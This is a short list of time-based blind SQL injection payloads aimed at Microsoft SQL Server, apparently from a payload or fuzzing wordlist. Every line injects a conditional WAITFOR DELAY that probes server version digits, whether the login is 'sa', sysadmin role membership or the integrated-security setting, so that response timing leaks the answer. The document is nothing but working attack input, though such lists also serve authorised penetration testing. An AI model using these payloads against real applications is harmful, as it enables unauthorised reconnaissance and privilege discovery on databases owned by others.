'; if not(substring((select @@version),25,1) <> 0) waitfor delay '0:0:5' -- 
'; if not(substring((select @@version),25,1) <> 5) waitfor delay '0:0:5' -- 
'; if not(substring((select @@version),25,1) <> 8) waitfor delay '0:0:5' -- 
'; if not(substring((select @@version),24,1) <> 1) waitfor delay '0:0:5' -- 
'; if not(select system_user) <> 'sa' waitfor delay '0:0:5' -- 
'; if is_srvrolemember('sysadmin') > 0 waitfor delay '0:0:5' -- 
'; if not((select serverproperty('isintegratedsecurityonly')) <> 1) waitfor delay '0:0:5' -- 
'; if not((select serverproperty('isintegratedsecurityonly')) <> 0) waitfor delay '0:0:5' -- 